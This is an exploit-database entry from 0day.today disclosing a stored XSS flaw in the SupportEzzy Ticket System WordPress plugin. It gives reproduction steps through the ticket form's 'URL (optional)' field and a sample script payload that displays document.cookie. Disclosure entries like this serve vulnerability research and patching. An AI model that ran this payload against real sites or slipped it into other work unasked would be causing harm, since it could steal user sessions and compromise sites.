[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SupportEzzy Ticket System WordPress Plugin Stored XSS Vulnerability

Author
Halil Dalabasmaz
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-22859
Category
web applications
Date add
13-11-2014
Platform
php
Register and login to system and then submit new ticket. "URL (optional)" input is not secure. You can run XSS payloads, use sample payload to test.

Sample Payload for Stored XSS: http://example.com"><script>alert(document.cookie);</script>

#  0day.today [2024-12-26]  #